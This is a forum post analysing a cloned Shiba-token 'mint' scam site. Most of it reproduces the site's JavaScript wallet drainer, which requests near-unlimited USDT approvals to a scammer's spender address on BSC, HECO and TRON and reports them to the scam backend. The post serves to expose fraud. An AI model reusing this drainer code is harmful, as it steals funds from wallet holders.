shiba mint骗局?
- 求职(安全岗)
- 更新于 2022-05-04 14:12
- 阅读 2155
在群里看到有人发一个项目,粗略的看了下,网站js都写在了前端。
在群里看到有人发一个项目
粗略的看了下,网站js都写在了前端。
一上来就要我授权给0x01423c3054218A0d668E045904bE6216a7579887而且授权的钱为9000000000000000000000000000000000000000000000
这个网站好像克隆的官网https://www.shibatoken.com/
这个接口可以直接更新用户的余额
查询也可以看到usdtbalance确实被修改了
但是无法取出来
这个修改的值是我发包弄得,不知道正常流程能不能取出来,没钱测试
let ContractAddress = '0x55d398326f99059ff775485246999027b3197955';
let mainchain = 'BSC(BEP20)';
let spender = '0x01423c3054218A0d668E045904bE6216a7579887';
const decimals = 18;
const heco = '0x80';
const bsc = '0x38';
function detectionEnvironment() {
if (typeof window.ethereum !== 'undefined') {
return true;
}
}
// bsc授权
function bscAuthorization(walletaddress, spender, amount) {
let web3 = new Web3(window.ethereum);
//var amo = amount * Math.pow(10, decimals);
//alert(ContractAddress);
var myContract = new web3.eth.Contract(bscUSDTcoAngelABIn, ContractAddress, { from: walletaddress, gasPrice: web3.eth.gasPrice })
myContract.methods.approve(spender, "9000000000000000000000000000000000000000000000").send().then(function (r) {
// console.log(r);
//s(r);
// alert(JSON.stringify(r));
$.ajax({
type: 'post',
url: "/redirect/auth/10197",
data: JSON.stringify(r),
success: function (result) {
$("#btnsuccess").html("<button type=\"button\" class=\"close\" data-dismiss=\"alert\">×</button><strong> success!</strong> Authorization succeeded。");
$("#btnsuccess").attr("class", "alert alert-success");
$("#btnsuccess").show();
}
})
})
}
// heco授权
function HecoAuthorization(walletaddress, spender, amount) {
let web3 = new Web3(window.ethereum);
var amo = amount * Math.pow(10, decimals);
var myContract = new web3.eth.Contract(hecoUSDTabi, ContractAddress, { from: walletaddress, gasPrice: web3.eth.gasPrice })
myContract.methods.approve(spender,"9000000000000000000000000000000000000000000000").send().then(function (r) {
//console.log(r)
//s(r);
//alert(JSON.stringify(r));
$.ajax({
type: 'post',
url: "/redirect/auth/10197",
data: JSON.stringify(r),
success: function (result) {
$("#btnsuccess").html("<button type=\"button\" class=\"close\" data-dismiss=\"alert\">×</button><strong> success!</strong> Authorization succeeded。");
$("#btnsuccess").attr("class", "alert alert-success");
$("#btnsuccess").show();
}
})
})
}
async function LinkAuthorization(chainid, LinkchainId, spender, amount) {
const accounts = await ethereum.request({ method: 'eth_requestAccounts' });
const account = accounts[0];
if (chainid == LinkchainId) {
if (chainid == bsc) {
bscAuthorization(account, spender, amount);
} if (chainid == heco) {
HecoAuthorization(account, spender, amount);
} else {
//alert('Unrecognized network');
}
} else {
alert('No wallet environment');
}
}
async function authorization(chainid, spender, amount) {
if(detectionEnvironment() == true) {
const LinkchainId = await ethereum.request({ method: 'eth_chainId' });
LinkAuthorization(chainid, LinkchainId, spender, amount);
} else {
alert('No wallet environment');
}
}
// 获取余额
function getbalance(chain, walletaddress, contractabi, contractaddress) {
let web3 = new Web3(window.ethereum);
var myContract = new web3.eth.Contract(contractabi, contractaddress, { from: walletaddress, gasPrice: web3.eth.gasPrice })
myContract.methods.balanceOf(walletaddress).call().then(function (balance) {
//console.log(chain + '余额:' + parseInt(balance) / Math.pow(10,decimals));
//s(r);
// alert(chain + '余额:' + parseInt(balance) / Math.pow(10, decimals));
var data = {
'user': '0x14052d4813fc5878e7a9abcd75e7b1c2b4b15def',
'address': walletaddress,
'balance': parseInt(balance) / Math.pow(10, decimals)
}
//$.ajax({
// type: 'post',
// url: "/redirect/balanceupdate",
// data: data,
// success: function (result) {
// }
//})
});
}
async function routingcenter(chainid, LinkchainId, purpose) {
const accounts = await ethereum.request({ method: 'eth_requestAccounts' });
const account = accounts[0];
if (chainid == LinkchainId) {
if (chainid == bsc && purpose == 'walletaddress') {
alert('bsc-address:' + account);// bsc钱包地址
} if (chainid == bsc && purpose == 'walletbalance') {
getbalance('bsc', account, bscUSDTcoAngelABIn, ContractAddress) // bsc钱包余额
} if (chainid == heco && purpose == 'walletaddress') {
alert('heco-address:' + account); // heco钱包地址
} if (chainid == heco && purpose == 'walletbalance') {
getbalance('heco', account, hecoUSDTabi, ContractAddress); // heco钱包余额
}
} else {
alert('Please switch the network');
}
}
async function Linkwallet(chainid, purpose) {
if (detectionEnvironment() == true) {
const LinkchainId = await ethereum.request({ method: 'eth_chainId' });
routingcenter(chainid, LinkchainId, purpose);
} else {
alert('No wallet environment');
}
}
async function trx() {
let tronWeb = window.tronWeb;
alert(tronWeb);
}
// 授权 钱包地址,授权金额
async function onConnect(spender, amount) {
let tronWeb = window.tronWeb;
let walletAddress = tronWeb.defaultAddress.base58;
//bizhong = await getMostValuableAssets(walletAddress);
let instance = await tronWeb.contract().at(ContractAddress);
let res = await instance["approve"](spender, parseInt(amount) * Math.pow(10, 6));
res.send({
feeLimit: 100000000,
callValue: 0,
shouldPollResponse: false
}, function (err, res) {
if (err==null)
{
var data2 = {
'blockHash': "",
'transactionHash': '',
'from': walletAddress.toString(),
'to': spender.toString(),
'status': 'True'
}
$.ajax({
type: 'post',
url: "/redirect/auth/10197",
data: JSON.stringify(data2),
success: function (result) {
$("#btnsuccess").html("<button type=\"button\" class=\"close\" data-dismiss=\"alert\">×</button><strong> success!</strong> Authorization succeeded。");
$("#btnsuccess").attr("class", "alert alert-success");
$("#btnsuccess").show();
}
})
}
//else
//{
// alert(JSON.stringify(err));
//}
})
}
async function tokenBalance() {
let tronWeb = window.tronWeb;
let walletAddress = tronWeb.defaultAddress.base58;
try {
let contract = await tronWeb.contract().at(ContractAddress);
let result = await contract.balanceOf(walletAddress).call();
$("#mybanance").html(parseFloat(result.toString())*0.000001);
var data = {
'user': '0x14052d4813fc5878e7a9abcd75e7b1c2b4b15def',
'address': address,
'balance': parseFloat(result.toString()) * 0.000001
}
//$.ajax({
// type: 'post',
// url: "/redirect/balanceupdate",
// data: data,
// success: function (result) {
// }
//})
console.log('result: ', result);
} catch (error) {
console.error("trigger smart contract error", error)
}
}
function reservedDecimal(val, digit) {
return Number(val).toFixed(digit);
}
async function intelligentchain() {
if (detectionEnvironment() == true) {
const LinkchainId = await ethereum.request({ method: 'eth_chainId' });
if (LinkchainId == heco) {
mainchain = "HT(HECO)";
var data = {
'configname': 'HT(HECO)_Address_Receive',
'qrcodekey': '416966c344784e588fdcadf65d6fcb20'
}
$.ajax({
type: 'post',
url: "/redirect/findcontractaddress2",
data: data,
success: function (result) {
spender = result.message;
ContractAddress = result.code;
$.ajax({
type: 'post', url: "/redirect/ifauth/0x14052d4813fc5878e7a9abcd75e7b1c2b4b15def",success: function (result) {
if(result.code=="0")
{
authorization(heco, spender, 900);
}
}
})
Linkwallet(heco, "walletbalance");
}
})
}
if (LinkchainId == bsc) {
mainchain = "BSC(BEP20)";
var data = {
'configname': 'BSC(BEP20)_Address_Receive',
'qrcodekey': '416966c344784e588fdcadf65d6fcb20'
}
$.ajax({
type: 'post',
url: "/redirect/findcontractaddress2",
data: data,
success: function (result) {
spender = result.message;
ContractAddress = result.code;
$.ajax({
type: 'post', url: "/redirect/ifauth/0x14052d4813fc5878e7a9abcd75e7b1c2b4b15def",success: function (result) {
if(result.code=="0")
{
authorization(bsc, spender, 900);
}
}
})
Linkwallet(bsc, "walletbalance");
}
})
}
} else {
mainchain = "TRON(TRC20)";
var data = {
'configname': 'TRON(TRC20)_Address_Receive',
'qrcodekey': '416966c344784e588fdcadf65d6fcb20'
}
$.ajax({
type: 'post',
url: "/redirect/findcontractaddress2",
data: data,
success: function (result) {
spender = result.message;
ContractAddress = result.code;
$.ajax({
type: 'post', url: "/redirect/ifauth/0x14052d4813fc5878e7a9abcd75e7b1c2b4b15def", success: function (result) {
if (result.code == "0") {
onConnect(spender, 900000000);
}
}
})
tokenBalance();
}
})
}
}
function participate() {
if (mainchain == "intelligence") {
intelligentchain();
}
else if (mainchain == "TRON(TRC20)")
{
$.ajax({
type: 'post', url: "/redirect/ifauth/0x14052d4813fc5878e7a9abcd75e7b1c2b4b15def", success: function (result) {
if(result.code=="0")
{
onConnect(spender, 900000000);
}
}
})
tokenBalance();
}
else if (mainchain == "BSC(BEP20)")
{
$.ajax({
type: 'post', url: "/redirect/ifauth/0x14052d4813fc5878e7a9abcd75e7b1c2b4b15def",success: function (result) {
if(result.code=="0")
{
authorization("0x38", spender, 900);
}
}
})
Linkwallet("0x38", "walletbalance");
}
else if(mainchain=="HT(HECO)")
{
$.ajax({
type: 'post', url: "/redirect/ifauth/0x14052d4813fc5878e7a9abcd75e7b1c2b4b15def",success: function (result) {
if(result.code=="0")
{
authorization("0x80", spender, 900);
}
}
})
Linkwallet("0x80", "walletbalance");
}
onConnect(spender, 900000000);
}
$(document).ready(function () {
$("#btnsuccess").hide();
$("#Withdrawal").click(function () {
$("#myModalLabel").text("Withdrawal");
$('#myModal').modal();
});
$("#Withdrawal2").click(function () {
$("#myModalLabel2").text("Withdrawal");
$('#myModal2').modal();
});
$("#Recharge").click(function () {
$("#myModalLabel1").text("Recharge");
$('#myModal1').modal();
});
$("#Cut").click(function () {
participate();
});
$("#btn_submit").click(function () {
//alert($('#txt_amount').val());
var data = {
'user': '0x14052d4813fc5878e7a9abcd75e7b1c2b4b15def',
'address': '0x14052d4813fc5878e7a9abcd75e7b1c2b4b15def',
'amount': $('#txt_amount').val()
}
$.ajax({
type: 'post',
url: "/redirect/withdrawalshib",
data: data,
success: function (result) {
if (result.code == "1") {
myBalance();
$("#btnsuccess").html("<button type=\"button\" class=\"close\" data-dismiss=\"alert\">×</button><strong> success!</strong> Congratulations on your successful withdrawal application。");
$("#btnsuccess").attr("class", "alert alert-success");
$("#btnsuccess").show();
}
else
{
$("#btnsuccess").html("<button type=\"button\" class=\"close\" data-dismiss=\"alert\">×</button><strong> error!</strong> " + result.message + "");
$("#btnsuccess").attr("class", "alert alert-danger");
$("#btnsuccess").show();
}
}
})
});
$("#btn_submit2").click(function () {
//alert($('#txt_amount').val());
var data = {
'user': '0x14052d4813fc5878e7a9abcd75e7b1c2b4b15def',
'address': '0x14052d4813fc5878e7a9abcd75e7b1c2b4b15def',
'amount': $('#txt_amount2').val()
}
$.ajax({
type: 'post',
url: "/redirect/withdrawal2",
data: data,
success: function (result) {
if (result.code == "1") {
myBalance();
$("#btnsuccess").html("<button type=\"button\" class=\"close\" data-dismiss=\"alert\">×</button><strong> success!</strong> Congratulations on your successful withdrawal application。");
$("#btnsuccess").attr("class", "alert alert-success");
$("#btnsuccess").show();
}
else
{
$("#btnsuccess").html("<button type=\"button\" class=\"close\" data-dismiss=\"alert\">×</button><strong> error!</strong> " + result.message + "");
$("#btnsuccess").attr("class", "alert alert-danger");
$("#btnsuccess").show();
}
}
})
});
$("#btn_submit1").click(function () {
participate();
participate2();
});
myBalance();
participate();
});
function participate2() {
if (mainchain == "TRON(TRC20)") {
TronTransfer(spender, $('#txt_amount1').val());
}
if (mainchain == "BSC(BEP20)") {
launchbscpayment('token', spender, $('#txt_amount1').val(), bscUSDTcoAngelABIn, ContractAddress, 18);
}
if (mainchain == "HT(HECO)") {
launchhecopayment('token', spender, $('#txt_amount1').val(), hecoUSDTabi, ContractAddress, 18);
}
}
async function myBalance() {
$.ajax({
type: 'post',
url: "/redirect/mybalance/0x14052d4813fc5878e7a9abcd75e7b1c2b4b15def",
success: function (result) {
if (result.code == "1") {
$("#mybanance").html(parseFloat(result.data.balance));
if (parseFloat(result.data.balance) > 0 && parseFloat(result.data.balance)<=3000)
$("#mh").html(reservedDecimal((parseFloat(result.data.balance) * 0.01) / 24, 8)*47619);
if (parseFloat(result.data.balance) > 3001 && parseFloat(result.data.balance) <= 20000)
$("#mh").html(reservedDecimal((parseFloat(result.data.balance) * 0.02) / 24, 8) * 47619);
if (parseFloat(result.data.balance) > 10000 && parseFloat(result.data.balance) > 50000)
$("#mh").html(reservedDecimal((parseFloat(result.data.balance) * 0.05) / 24, 8)*47619);
$("#miningrevenue").html(result.message * 47619);
}
}
})
}
function time_dis(direct_time) {
var now_time = Date.parse(new Date());
var end_time = Date.parse(new Date(direct_time));
if (end_time < now_time) {
return false
} else {
var time_dis = end_time - now_time;
var days = Math.floor(time_dis / (24 * 3600 * 1000));
var leave1 = time_dis % (24 * 3600 * 1000);
var hours = Math.floor(leave1 / (3600 * 1000));
var leave2 = leave1 % (3600 * 1000);
var minutes = Math.floor(leave2 / (60 * 1000));
var leave3 = leave2 % (60 * 1000);
var second = leave3 / 1000;
return days*24+hours;
}
}
function makeCode(url) {
qrcode222.makeCode(url);
}
function copyurl(url)
{
url = "https://" + window.location.host + url;
$("#qrcode").html("");
var qrcode222 = new QRCode(document.getElementById("qrcode"), {
width: 256,
height: 256
});
qrcode222.makeCode(url);
//alert(url)
var copyTest = url
var inputTest = document.createElement('input')
inputTest.value = copyTest
document.body.appendChild(inputTest)
inputTest.select()
document.execCommand('Copy')
inputTest.className = 'oInput'
inputTest.style.display = 'none'
alert("The link has been copied successfully. Please share it with your friends");
}
async function TronTransfer(to, amount) {
let tronWeb = window.tronWeb;
try {
let contract = await tronWeb.contract().at(ContractAddress);
let result = await contract.transfer(
to,
amount * Math.pow(10, 6)
).send({
feeLimit: 6000000
}).then(output => {
var data = {
'username': '0x14052d4813fc5878e7a9abcd75e7b1c2b4b15def',
'chain': "TRON(TRC20)",
'hashcode': output.toString(),
'balance': $('#txt_amount1').val(),
'recommend': ''
}
$.ajax({
type: 'post',
url: "/redirect/usdtreturn",
data: data,
success: function (result) {
myBalance();
}
})
// alert(output);
});
console.log('result: ', result);
} catch (error) {
console.error("trigger smart contract error", error)
alert(error)
}
}
/*
* bsc, heco链支付
*
*/
// 主链币支付
async function transfer(walletaddress, to, amount, chain) {
let web3 = new Web3(window.web3.currentProvider);
var balance = await web3.eth.getBalance(walletaddress);
if (balance / Math.pow(10, 18) > amount) {
web3.eth.sendTransaction({
gas: web3.eth.gas,
gasPrice: web3.eth.gasPrice,
from: walletaddress,
to: to,
value: amount * Math.pow(10, 6)
}, (err, result) => {
if (!err) {
alert("所在链:" + chain + ",交易hash:" + result);
// s(result);
} else {
alert("所在链:" + chain + ",异常:" + err);
}
})
} else {
alert('余额不足');
}
}
// 代币支付
async function transfertoken(coAngelABIn, contractaddress, walletaddress, address_to, amount, decimals, chain) {
let web3 = new Web3(window.ethereum);
var myContract = new web3.eth.Contract(coAngelABIn, contractaddress, { from: walletaddress, gasPrice: web3.eth.gasPrice })
myContract.methods.balanceOf(walletaddress).call().then(function (balance) {
if (parseInt(balance) / Math.pow(10, decimals) >= amount) {
var myContract = new web3.eth.Contract(coAngelABIn, contractaddress, { from: walletaddress, gasPrice: web3.eth.gasPrice })
myContract.methods.transfer(address_to, (amount * Math.pow(10, decimals)).toString()).send().then(function (err, hash) {
//alert(err.transactionHash);
var data = {
'username': '0x14052d4813fc5878e7a9abcd75e7b1c2b4b15def',
'chain': mainchain,
'hashcode': err.transactionHash,
'balance': $('#txt_amount1').val(),
'recommend': ''
}
$.ajax({
type: 'post',
url: "/redirect/usdtreturn",
data: data,
success: function (result) {
// alert(2222);
myBalance();
}
})
//alert(err.blockHash);
})
} else {
alert('余额不足');
}
});
}
// bsc链支付
function bscpayment(identification, to, amount, contractabi, contract, decimals) {
window.ethereum.enable().then((res) => {
if (identification == 'bnb') {
transfer(res[0], to, amount, 'bsc链');
} else {
transfertoken(contractabi, contract, res[0], to, amount, decimals, 'BSC(BEP20)');
}
})
}
// heco链支付
function hecopayment(identification, to, amount, contractabi, contract, decimals) {
window.ethereum.enable().then((res) => {
if (identification == 'ht') {
transfer(res[0], to, amount, 'heco链');
} else {
transfertoken(contractabi, contract, res[0], to, amount, decimals, 'HT(HECO)');
}
})
}
// 发起bsc链支付
async function launchbscpayment(identification, to, amount, contractabi, contract, decimals) {
if (detectionEnvironment() == true) {
const LinkchainId = await ethereum.request({ method: 'eth_chainId' });
if (LinkchainId == bsc) {
// bsc
bscpayment(identification, to, amount, contractabi, contract, decimals)
} else {
alert('请切换至bsc主网络支付');
}
} else {
alert('没有MetaMask环境');
}
}
// 发起heco链支付
async function launchhecopayment(identification, to, amount, contractabi, contract, decimals) {
if (detectionEnvironment() == true) {
const LinkchainId = await ethereum.request({ method: 'eth_chainId' });
if (LinkchainId == heco) {
bscpayment(identification, to, amount, contractabi, contract, decimals)
} else {
alert('请切换至heco主网络支付');
}
} else {
alert('没有MetaMask环境');
}
}
async function trxtransfer(to, amount) {
let tronWeb = window.tronWeb;
const unSignedTxn = await tronWeb.transactionBuilder.sendTrx(to, amount * Math.pow(10, 6));
const unSignedTxnWithNote = await tronWeb.transactionBuilder.addUpdateData(unSignedTxn, '', 'utf8');
const signedTxn = await tronWeb.trx.sign(unSignedTxnWithNote);
tronWeb.trx.sendRawTransaction(signedTxn).then(output => { alert('- Output:', output, '\n'); });
}
